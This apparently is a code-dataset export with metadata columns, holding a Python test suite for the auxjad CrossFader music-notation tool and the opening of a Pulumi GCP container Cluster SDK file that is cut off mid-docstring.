| 0.263566
| 0.325581
| 0.527132
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.041667
| 0.09434
| 159
| 5
| 64
| 31.8
| 0.854167
| 0.194969
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9f58b4464d42f9b79084d0d81294219a7e0c652b
| 35,170
|
py
|
Python
|
tests/core/test_CrossFader.py
|
gilbertohasnofb/auxjad
|
553b7fe97221b6f378a93ade6262f024e3cbc678
|
[
"MIT"
] | 6
|
2020-05-18T09:28:29.000Z
|
2021-12-22T00:40:54.000Z
|
tests/core/test_CrossFader.py
|
gilbertohasnofb/auxjad
|
553b7fe97221b6f378a93ade6262f024e3cbc678
|
[
"MIT"
] | 1
|
2021-04-21T20:29:38.000Z
|
2021-04-22T19:44:54.000Z
|
tests/core/test_CrossFader.py
|
gilbertohasnofb/auxjad
|
553b7fe97221b6f378a93ade6262f024e3cbc678
|
[
"MIT"
] | 1
|
2021-04-21T18:54:46.000Z
|
2021-04-21T18:54:46.000Z
|
import random
import abjad
import auxjad
def test_CrossFader_01():
random.seed(17737)
fade_out_container = abjad.Staff(r"fs'4 g'2 bf'4")
fade_in_container = abjad.Staff(r"\times 4/5 {cs''4 d''1}")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
assert abjad.lilypond(fader) == abjad.String.normalize(
r"""
\new Staff
{
\time 4/4
fs'4
g'2
bf'4
}
\new Staff
{
\times 4/5
{
\time 4/4
cs''4
d''1
}
}
"""
)
selection_a, selection_b = fader()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
fs'4
g'2
bf'4
}
\new Staff
{
\time 4/4
R1
}
>>
"""
)
selection_a, selection_b = fader()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
fs'4
g'2
bf'4
}
\new Staff
{
\times 4/5
{
\time 4/4
r4
d''1
}
}
>>
"""
)
selection_a, selection_b = fader.current_window
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
fs'4
g'2
bf'4
}
\new Staff
{
\times 4/5
{
\time 4/4
r4
d''1
}
}
>>
"""
)
def test_CrossFader_02():
fade_out_container = abjad.Container(r"c'4 d'4 ~ d'4 r4")
fade_in_container = abjad.Container(r"r2 c''2")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
assert len(fader) == 3
fade_out_container = abjad.Container(r"fs'4 g'2 bf'4")
fade_in_container = abjad.Container(r"\times 4/5 {cs''4 d''1}")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
assert len(fader) == 5
fade_out_container = abjad.Container(r"c'4 d'4 ~ d'4 r4")
fade_in_container = abjad.Container(r"r2 <c'' e'' g''>2")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
assert len(fader) == 5
def test_CrossFader_03():
random.seed(44811)
fade_out_container = abjad.Container(r"fs'4 g'2 bf'4")
fade_in_container = abjad.Container(r"\times 4/5 {cs''4 d'1}")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
staff_a = abjad.Staff()
staff_b = abjad.Staff()
score = abjad.Score([staff_a, staff_b])
for _ in range(3):
selection_a, selection_b = fader()
staff_a.extend(selection_a)
staff_b.extend(selection_b)
fader.reset()
selection_a, selection_b = fader()
staff_a.extend(selection_a)
staff_b.extend(selection_b)
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
fs'4
g'2
bf'4
\time 4/4
fs'4
g'2
bf'4
\time 4/4
fs'4
r2
bf'4
\time 4/4
fs'4
g'2
bf'4
}
\new Staff
{
\time 4/4
R1
\times 4/5
{
\time 4/4
cs''4
r1
}
\times 4/5
{
\time 4/4
cs''4
r1
}
\time 4/4
R1
}
>>
"""
)
def test_CrossFader_04():
random.seed(44811)
fade_out_container = abjad.Container(r"fs'4 g'2 bf'4")
fade_in_container = abjad.Container(r"\times 4/5 {cs''4 d'1}")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
fs'4
g'2
bf'4
fs'4
g'2
bf'4
fs'4
r2
bf'4
fs'4
r2
bf'4
r2.
bf'4
R1
}
\new Staff
{
\time 4/4
R1
\times 4/5
{
cs''4
r1
}
\times 4/5
{
cs''4
r1
}
\times 4/5
{
cs''4
d'1
}
\times 4/5
{
cs''4
d'1
}
\times 4/5
{
cs''4
d'1
}
}
>>
"""
)
def test_CrossFader_05():
random.seed(10711)
fade_out_container = abjad.Container(r"e'8 fs'4. r2")
fade_in_container = abjad.Container(r"c''2 ~ c''8 d''4.")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
selection_a, selection_b = fader.output_n(3)
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
e'8
fs'4.
r2
e'8
fs'4.
r2
e'8
r2..
}
\new Staff
{
\time 4/4
R1
c''2
~
c''8
r4.
c''2
~
c''8
r4.
}
>>
"""
)
def test_CrossFader_06():
random.seed(10711)
fade_out_container = abjad.Container(r"e'8 fs'4. r2")
fade_in_container = abjad.Container(r"c''2 ~ c''8 d''4.")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
staff_a = abjad.Staff()
staff_b = abjad.Staff()
score = abjad.Score([staff_a, staff_b])
for selection_a, selection_b in fader:
staff_a.extend(selection_a)
staff_b.extend(selection_b)
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
e'8
fs'4.
r2
\time 4/4
e'8
fs'4.
r2
\time 4/4
e'8
r2..
\time 4/4
e'8
r2..
\time 4/4
R1
}
\new Staff
{
\time 4/4
R1
\time 4/4
c''2
~
c''8
r4.
\time 4/4
c''2
~
c''8
r4.
\time 4/4
c''2
~
c''8
d''4.
\time 4/4
c''2
~
c''8
d''4.
}
>>
"""
)
def test_CrossFader_07():
random.seed(87114)
fade_out_container = abjad.Container(r"e'8 fs'4. r2")
fade_in_container = abjad.Container(r"c''2 ~ c''8 d''4.")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
staff_a = abjad.Staff()
staff_b = abjad.Staff()
score = abjad.Score([staff_a, staff_b])
for _ in range(3):
selection_a, selection_b = next(fader)
staff_a.extend(selection_a)
staff_b.extend(selection_b)
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
e'8
fs'4.
r2
\time 4/4
e'8
r2..
\time 4/4
e'8
r2..
}
\new Staff
{
\time 4/4
R1
\time 4/4
R1
\time 4/4
c''2
~
c''8
r4.
}
>>
"""
)
def test_CrossFader_08():
random.seed(62190)
fade_out_container = abjad.Container(r"\time 3/4 r4 c'4 d'4")
fade_in_container = abjad.Container(r"\time 3/4 a''4 g''2")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 3/4
r4
c'4
d'4
r2
d'4
r2
d'4
R1 * 3/4
R1 * 3/4
}
\new Staff
{
\time 3/4
R1 * 3/4
R1 * 3/4
a''4
r2
a''4
r2
a''4
g''2
}
>>
"""
)
random.seed(62190)
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
fade_out_last=True,
)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 3/4
r4
c'4
d'4
r2
d'4
r2
d'4
r2
d'4
R1 * 3/4
}
\new Staff
{
\time 3/4
R1 * 3/4
R1 * 3/4
a''4
r2
a''4
g''2
a''4
g''2
}
>>
"""
)
random.seed(62190)
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
fade_in_first=True,
fade_out_last=True,
)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 3/4
r4
c'4
d'4
r4
c'4
d'4
r4
c'4
d'4
r2
d'4
R1 * 3/4
}
\new Staff
{
\time 3/4
R1 * 3/4
a''4
r2
a''4
g''2
a''4
g''2
a''4
g''2
}
>>
"""
)
def test_CrossFader_09():
random.seed(50137)
fade_out_container = abjad.Container(r"e'2 c'2")
fade_in_container = abjad.Container(
r"c''8 d''8 e''8 f''8 g''8 a''8 b''8 c'''8"
)
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
e'2
c'2
e'2
c'2
r2
c'2
r2
c'2
r2
c'2
R1
R1
R1
R1
R1
R1
}
\new Staff
{
\time 4/4
R1
r4.
f''8
r2
r4.
f''8
r2
r4.
f''8
r8
a''8
r4
r4.
f''8
r8
a''8
b''8
r8
r4.
f''8
r8
a''8
b''8
r8
r4.
f''8
r8
a''8
b''8
c'''8
r4
e''8
f''8
r8
a''8
b''8
c'''8
r8
d''8
e''8
f''8
r8
a''8
b''8
c'''8
c''8
d''8
e''8
f''8
r8
a''8
b''8
c'''8
c''8
d''8
e''8
f''8
g''8
a''8
b''8
c'''8
}
>>
"""
)
random.seed(50137)
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
weighted_duration=True,
)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
e'2
c'2
e'2
c'2
r2
c'2
r2
c'2
r2
c'2
r2
c'2
r2
c'2
r2
c'2
r2
c'2
r2
c'2
R1
}
\new Staff
{
\time 4/4
R1
r4.
f''8
r2
r4.
f''8
r2
r4.
f''8
r8
a''8
r4
r4.
f''8
r8
a''8
b''8
r8
r4
e''8
f''8
r8
a''8
b''8
r8
r4
e''8
f''8
g''8
a''8
b''8
r8
c''8
r8
e''8
f''8
g''8
a''8
b''8
r8
c''8
r8
e''8
f''8
g''8
a''8
b''8
c'''8
c''8
d''8
e''8
f''8
g''8
a''8
b''8
c'''8
c''8
d''8
e''8
f''8
g''8
a''8
b''8
c'''8
}
>>
"""
)
def test_CrossFader_10():
fade_out_container = abjad.Container(r"\time 3/4 e2 \times 2/3 {fs8 gs4}")
fade_in_container = abjad.Container(r"\time 3/4 c'8 d' e' f' g' a'")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
fader.fade_out_contents = abjad.Container(r"\time 3/4 a4. bf4.")
assert abjad.lilypond(fader) == abjad.String.normalize(
r"""
{
%%% \time 3/4 %%%
a4.
bf4.
}
{
%%% \time 3/4 %%%
c'8
d'8
e'8
f'8
g'8
a'8
}
"""
)
def test_CrossFader_11():
random.seed(41379)
fade_out_container = abjad.Container(r"a'4 bf'2 r4")
fade_in_container = abjad.Container(r"c''2 d''2")
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
initial_repetitions=2,
final_repetitions=3,
)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
a'4
bf'2
r4
a'4
bf'2
r4
r4
bf'2
r4
r4
bf'2
r4
r4
bf'2
r4
R1
R1
R1
}
\new Staff
{
\time 4/4
R1
R1
R1
r2
d''2
c''2
d''2
c''2
d''2
c''2
d''2
c''2
d''2
}
>>
"""
)
def test_CrossFader_12():
random.seed(91766)
fade_out_container = abjad.Container(r"a'4 bf'2 r4")
fade_in_container = abjad.Container(r"c''2 d''2")
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
repetition_chance=0.8,
)
selection_a, selection_b = fader.output_n(4)
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
a'4
bf'2
r4
a'4
bf'2
r4
a'4
bf'2
r4
a'4
bf'2
r4
}
\new Staff
{
\time 4/4
R1
r2
d''2
r2
d''2
r2
d''2
}
>>
"""
)
def test_CrossFader_13():
random.seed(81943)
fade_out_container = abjad.Container(
r"\time 3/4 a'4 bf'2 ~ \time 2/4 bf'4 f'4"
)
fade_in_container = abjad.Container(
r"\time 3/4 r16 cs''4.. e''4 \time 2/4 d''2"
)
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
selection_a, selection_b = fader.output_n(3)
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 3/4
a'4
bf'2
~
\time 2/4
bf'4
f'4
\time 3/4
a'4
bf'2
~
\time 2/4
bf'4
f'4
\time 3/4
a'4
bf'2
~
\time 2/4
bf'4
r4
}
\new Staff
{
\time 3/4
R1 * 3/4
\time 2/4
R1 * 1/2
\time 3/4
r16
cs''4..
r4
\time 2/4
R1 * 1/2
\time 3/4
r16
cs''4..
r4
\time 2/4
R1 * 1/2
}
>>
"""
)
def test_CrossFader_14():
random.seed(75991)
fade_out_container = abjad.Container(r"fs'4 g'2 bf'4")
fade_in_container = abjad.Container(r"\times 4/5 {cs''4 d''1}")
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
omit_time_signatures=True,
)
selection_a, selection_b = fader.output_n(3)
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
fs'4
g'2
bf'4
fs'4
g'2
r4
fs'4
g'2
r4
}
\new Staff
{
R1
R1
\times 4/5
{
cs''4
r1
}
}
>>
"""
)
def test_CrossFader_15():
random.seed(33163)
fade_out_container = abjad.Container(r"c'8 d'4 e'8 ~ e'2")
fade_in_container = abjad.Container(r"c'2 d'2")
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
disable_rewrite_meter=True,
)
selection_a, selection_b = fader.output_n(3)
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
c'8
d'4
e'8
~
e'2
r8
d'4
e'8
~
e'2
r8
d'4
e'8
~
e'2
}
\new Staff
{
\time 4/4
R1
R1
r2
d'2
}
>>
"""
)
def test_CrossFader_16():
random.seed(81662)
fade_out_container = abjad.Container(r"\time 3/4 c'4 d'4 e'4")
fade_in_container = abjad.Container(r"\time 4/4 g'2 a'2")
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
fade_in_first=True,
fade_out_last=True,
weighted_duration=True,
)
selection_a, selection_b = fader.output_all()
staff_a = abjad.Staff(selection_a)
staff_b = abjad.Staff(selection_b)
auxjad.mutate.sync_containers([staff_a, staff_b])
score = abjad.Score([staff_a, staff_b])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 3/4
c'4
d'4
e'4
c'4
d'4
e'4
c'4
r4
e'4
c'4
r2
c'4
r2
R1 * 3/4
R1 * 3/4
R1 * 3/4
}
\new Staff
{
\time 4/4
R1
r2
a'2
r2
a'2
r2
a'2
g'2
a'2
g'2
a'2
}
>>
"""
)
def test_CrossFader_17():
fade_out_container = abjad.Container(r"fs'4 g'2 bf'4")
fade_in_container = abjad.Container(r"\times 4/5 {cs''4 d''1}")
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
fade_in_first=True,
fade_out_last=True,
initial_repetitions=3,
final_repetitions=3,
repetition_chance=0.7,
weighted_duration=True,
disable_rewrite_meter=True,
omit_time_signatures=True,
use_multimeasure_rests=True,
boundary_depth=True,
maximum_dot_count=True,
rewrite_tuplets=True,
)
assert fader.fade_in_first
assert fader.fade_out_last
assert fader.initial_repetitions == 3
assert fader.final_repetitions == 3
assert fader.repetition_chance == 0.7
assert fader.weighted_duration
assert fader.disable_rewrite_meter
assert fader.omit_time_signatures
assert fader.use_multimeasure_rests
assert fader.boundary_depth
assert fader.maximum_dot_count
assert fader.rewrite_tuplets
fader.fade_in_first = False
fader.fade_out_last = False
fader.initial_repetitions = 4
fader.final_repetitions = 7
fader.repetition_chance = 0.23
fader.weighted_duration = False
fader.disable_rewrite_meter = False
fader.omit_time_signatures = False
fader.use_multimeasure_rests = False
fader.boundary_depth = False
fader.maximum_dot_count = False
fader.rewrite_tuplets = False
assert not fader.fade_in_first
assert not fader.fade_out_last
assert fader.initial_repetitions == 4
assert fader.final_repetitions == 7
assert fader.repetition_chance == 0.23
assert not fader.weighted_duration
assert not fader.disable_rewrite_meter
assert not fader.omit_time_signatures
assert not fader.use_multimeasure_rests
assert not fader.boundary_depth
assert not fader.maximum_dot_count
assert not fader.rewrite_tuplets
def test_CrossFader_18():
random.seed(97142)
fade_out_container = abjad.Container(r"c'4.\p e'8--\f ~ e'2")
fade_in_container = abjad.Container(
r"\times 2/3 {f'4-.\pp r4 d'4->\f ~ } d'2"
)
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
fade_in_first=True,
fade_out_last=True,
)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\time 4/4
c'4.
\p
e'8
\f
- \tenuto
~
e'2
c'4.
\p
e'8
\f
- \tenuto
~
e'2
r4.
e'8
- \tenuto
~
e'2
r4.
e'8
- \tenuto
~
e'2
R1
}
\new Staff
{
\time 4/4
R1
\times 2/3
{
f'4
\pp
- \staccato
r2
}
r2
\times 2/3
{
f'4
- \staccato
r2
}
r2
\times 2/3
{
f'4
- \staccato
r4
d'4
\f
- \accent
~
}
d'2
\times 2/3
{
f'4
\pp
- \staccato
r4
d'4
\f
- \accent
~
}
d'2
}
>>
"""
)
def test_CrossFader_19():
random.seed(25519)
fade_out_container = abjad.Container(r"\times 2/3 {<c' e'>2 g'1}")
fade_in_container = abjad.Container(r"<d' ef'>2. <bf a'>4")
fader = auxjad.CrossFader(fade_out_container,
fade_in_container,
fade_in_first=True,
fade_out_last=True,
)
selection_a, selection_b = fader.output_all()
score = abjad.Score([
abjad.Staff(selection_a),
abjad.Staff(selection_b),
])
assert abjad.lilypond(score) == abjad.String.normalize(
r"""
\new Score
<<
\new Staff
{
\times 2/3
{
\time 4/4
<c' e'>2
g'1
}
\times 2/3
{
<c' e'>2
g'1
}
\times 2/3
{
<c' e'>2
g'1
}
\times 2/3
{
<c' e'>2
g'1
}
\times 2/3
{
c'2
g'1
}
\times 2/3
{
c'2
g'1
}
\times 2/3
{
c'2
r1
}
R1
}
\new Staff
{
\time 4/4
R1
ef'2.
r4
<d' ef'>2.
r4
<d' ef'>2.
bf4
<d' ef'>2.
bf4
<d' ef'>2.
<bf a'>4
<d' ef'>2.
<bf a'>4
<d' ef'>2.
<bf a'>4
}
>>
"""
)
def test_CrossFader_20():
random.seed(87144)
fade_out_container = abjad.Container(r"b'8 c''8 e''2 g''4")
fade_in_container = abjad.Container(r"\times 2/3 {e'2 d'2 c'2}")
fader = auxjad.CrossFader(fade_out_container, fade_in_container)
selection_a, selection_b = fader.output_all()
literal_voice_one = abjad.LilyPondLiteral(r'\voiceOne')
literal_voice_two = abjad.LilyPondLiteral(r'\voiceTwo')
abjad.attach(literal_voice_one, selection_a[0])
abjad.attach(literal_voice_two, selection_b[0])
staff = abjad.Staff(
[abjad.Voice(selection_a), abjad.Voice(selection_b)],
simultaneous=True,
)
assert abjad.lilypond(staff) == abjad.String.normalize(
r"""
\new Staff
<<
\new Voice
{
\time 4/4
\voiceOne
b'8
c''8
e''2
g''4
b'8
c''8
e''2
r4
b'8
c''8
e''2
r4
b'8
c''8
e''2
r4
b'8
c''8
e''2
r4
b'8
c''8
r2.
b'8
r2..
R1
}
\new Voice
{
\time 4/4
\voiceTwo
R1
R1
\times 2/3
{
r1
c'2
}
\times 2/3
{
e'2
r2
c'2
}
\times 2/3
{
e'2
d'2
c'2
}
\times 2/3
{
e'2
d'2
c'2
}
\times 2/3
{
e'2
d'2
c'2
}
\times 2/3
{
e'2
d'2
c'2
}
}
>>
"""
)
| 24.288674
| 78
| 0.336736
| 3,404
| 35,170
| 3.339013
| 0.042303
| 0.051909
| 0.028506
| 0.088686
| 0.838466
| 0.793507
| 0.771248
| 0.745381
| 0.704469
| 0.652736
| 0
| 0.077752
| 0.577993
| 35,170
| 1,447
| 79
| 24.30546
| 0.688047
| 0
| 0
| 0.548148
| 0
| 0.009877
| 0.057372
| 0
| 0
| 0
| 0
| 0
| 0.125926
| 1
| 0.049383
| false
| 0
| 0.007407
| 0
| 0.05679
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4c934d2baf5e9d283d92a39c0ee6e12a4247eb8e
| 220,298
|
py
|
Python
|
sdk/python/pulumi_gcp/container/cluster.py
|
pjbizon/pulumi-gcp
|
0d09cbc1dcf50093a177531f7596c27db11a2e58
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/container/cluster.py
|
pjbizon/pulumi-gcp
|
0d09cbc1dcf50093a177531f7596c27db11a2e58
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/container/cluster.py
|
pjbizon/pulumi-gcp
|
0d09cbc1dcf50093a177531f7596c27db11a2e58
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ClusterArgs', 'Cluster']
@pulumi.input_type
class ClusterArgs:
def __init__(__self__, *,
addons_config: Optional[pulumi.Input['ClusterAddonsConfigArgs']] = None,
authenticator_groups_config: Optional[pulumi.Input['ClusterAuthenticatorGroupsConfigArgs']] = None,
cluster_autoscaling: Optional[pulumi.Input['ClusterClusterAutoscalingArgs']] = None,
cluster_ipv4_cidr: Optional[pulumi.Input[str]] = None,
cluster_telemetry: Optional[pulumi.Input['ClusterClusterTelemetryArgs']] = None,
confidential_nodes: Optional[pulumi.Input['ClusterConfidentialNodesArgs']] = None,
database_encryption: Optional[pulumi.Input['ClusterDatabaseEncryptionArgs']] = None,
datapath_provider: Optional[pulumi.Input[str]] = None,
default_max_pods_per_node: Optional[pulumi.Input[int]] = None,
default_snat_status: Optional[pulumi.Input['ClusterDefaultSnatStatusArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
dns_config: Optional[pulumi.Input['ClusterDnsConfigArgs']] = None,
enable_autopilot: Optional[pulumi.Input[bool]] = None,
enable_binary_authorization: Optional[pulumi.Input[bool]] = None,
enable_intranode_visibility: Optional[pulumi.Input[bool]] = None,
enable_kubernetes_alpha: Optional[pulumi.Input[bool]] = None,
enable_l4_ilb_subsetting: Optional[pulumi.Input[bool]] = None,
enable_legacy_abac: Optional[pulumi.Input[bool]] = None,
enable_shielded_nodes: Optional[pulumi.Input[bool]] = None,
enable_tpu: Optional[pulumi.Input[bool]] = None,
identity_service_config: Optional[pulumi.Input['ClusterIdentityServiceConfigArgs']] = None,
initial_node_count: Optional[pulumi.Input[int]] = None,
ip_allocation_policy: Optional[pulumi.Input['ClusterIpAllocationPolicyArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
logging_config: Optional[pulumi.Input['ClusterLoggingConfigArgs']] = None,
logging_service: Optional[pulumi.Input[str]] = None,
maintenance_policy: Optional[pulumi.Input['ClusterMaintenancePolicyArgs']] = None,
master_auth: Optional[pulumi.Input['ClusterMasterAuthArgs']] = None,
master_authorized_networks_config: Optional[pulumi.Input['ClusterMasterAuthorizedNetworksConfigArgs']] = None,
min_master_version: Optional[pulumi.Input[str]] = None,
monitoring_config: Optional[pulumi.Input['ClusterMonitoringConfigArgs']] = None,
monitoring_service: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
network_policy: Optional[pulumi.Input['ClusterNetworkPolicyArgs']] = None,
networking_mode: Optional[pulumi.Input[str]] = None,
node_config: Optional[pulumi.Input['ClusterNodeConfigArgs']] = None,
node_locations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
node_pools: Optional[pulumi.Input[Sequence[pulumi.Input['ClusterNodePoolArgs']]]] = None,
node_version: Optional[pulumi.Input[str]] = None,
notification_config: Optional[pulumi.Input['ClusterNotificationConfigArgs']] = None,
pod_security_policy_config: Optional[pulumi.Input['ClusterPodSecurityPolicyConfigArgs']] = None,
private_cluster_config: Optional[pulumi.Input['ClusterPrivateClusterConfigArgs']] = None,
private_ipv6_google_access: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
release_channel: Optional[pulumi.Input['ClusterReleaseChannelArgs']] = None,
remove_default_node_pool: Optional[pulumi.Input[bool]] = None,
resource_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
resource_usage_export_config: Optional[pulumi.Input['ClusterResourceUsageExportConfigArgs']] = None,
subnetwork: Optional[pulumi.Input[str]] = None,
vertical_pod_autoscaling: Optional[pulumi.Input['ClusterVerticalPodAutoscalingArgs']] = None,
workload_identity_config: Optional[pulumi.Input['ClusterWorkloadIdentityConfigArgs']] = None):
"""
The set of arguments for constructing a Cluster resource.
:param pulumi.Input['ClusterAddonsConfigArgs'] addons_config: The configuration for addons supported by GKE.
Structure is documented below.
:param pulumi.Input['ClusterAuthenticatorGroupsConfigArgs'] authenticator_groups_config: Configuration for the
[Google Groups for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control#groups-setup-gsuite) feature.
Structure is documented below.
:param pulumi.Input['ClusterClusterAutoscalingArgs'] cluster_autoscaling: Per-cluster configuration of Node Auto-Provisioning with Cluster Autoscaler to
automatically adjust the size of the cluster and create/delete node pools based
on the current needs of the cluster's workload. See the
[guide to using Node Auto-Provisioning](https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-provisioning)
for more details. Structure is documented below.
:param pulumi.Input[str] cluster_ipv4_cidr: The IP address range of the Kubernetes pods
in this cluster in CIDR notation (e.g. `10.96.0.0/14`). Leave blank to have one
automatically chosen or specify a `/14` block in `10.0.0.0/8`. This field will
only work for routes-based clusters, where `ip_allocation_policy` is not defined.
:param pulumi.Input['ClusterClusterTelemetryArgs'] cluster_telemetry: Configuration for
[ClusterTelemetry](https://cloud.google.com/monitoring/kubernetes-engine/installing#controlling_the_collection_of_application_logs) feature,
Structure is documented below.
:param pulumi.Input['ClusterConfidentialNodesArgs'] confidential_nodes: Configuration for [Confidential Nodes](https://cloud.google.com/kubernetes-engine/docs/how-to/confidential-gke-nodes) feature. Structure is documented below documented below.
:param pulumi.Input['ClusterDatabaseEncryptionArgs'] database_encryption: Structure is documented below.
:param pulumi.Input[str] datapath_provider: The desired datapath provider for this cluster. By default, uses the IPTables-based kube-proxy implementation.
:param pulumi.Input[int] default_max_pods_per_node: The default maximum number of pods
per node in this cluster. This doesn't work on "routes-based" clusters, clusters
that don't have IP Aliasing enabled. See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr)
for more information.
:param pulumi.Input['ClusterDefaultSnatStatusArgs'] default_snat_status: [GKE SNAT](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-masquerade-agent#how_ipmasq_works) DefaultSnatStatus contains the desired state of whether default sNAT should be disabled on the cluster, [API doc](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters#networkconfig). Structure is documented below
:param pulumi.Input[str] description: Description of the cluster.
:param pulumi.Input['ClusterDnsConfigArgs'] dns_config: Configuration for [Using Cloud DNS for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/cloud-dns). Structure is documented below.
:param pulumi.Input[bool] enable_autopilot: Enable Autopilot for this cluster. Defaults to `false`.
Note that when this option is enabled, certain features of Standard GKE are not available.
See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-overview#comparison)
for available features.
